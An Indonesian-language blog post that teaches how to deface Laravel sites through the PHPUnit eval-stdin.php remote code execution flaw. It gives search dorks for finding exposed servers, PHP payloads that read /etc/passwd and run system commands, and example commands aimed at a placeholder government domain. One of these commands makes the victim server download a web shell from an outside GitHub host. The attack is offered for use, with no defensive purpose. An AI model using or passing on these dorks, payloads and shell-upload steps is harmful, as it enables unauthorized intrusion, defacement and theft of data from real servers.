Cara Deface Laravel PHPUNIT RCE
Ok Langsung Aja......
PHPUNIT RCE menggunakan Curl...
inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
* kembangin lagi biar dapet target lebih fresh
Xploit : vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
Kalo Blank Berarti Vuln
Kalian Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan. List payload yang bisa kalian gunakan
<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>
nah Contoh Comand Nya
"<?php system('uname -a'); ?>" https://targetkalian.gov/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Nah Jika Seperti Itu Berarti Vuln
Kalo mau upload shell cukup ganti payload nya saja
"<?php system('wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php'); ?>" https://targetkalian.gov/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Nah Ok Mungkin Segitu Aja Wassalamu'alaikum warahmatullahi wabarakatu Sampai Jumpa Lagi :)
Posting Komentar untuk "Cara Deface Laravel PHPUNIT RCE"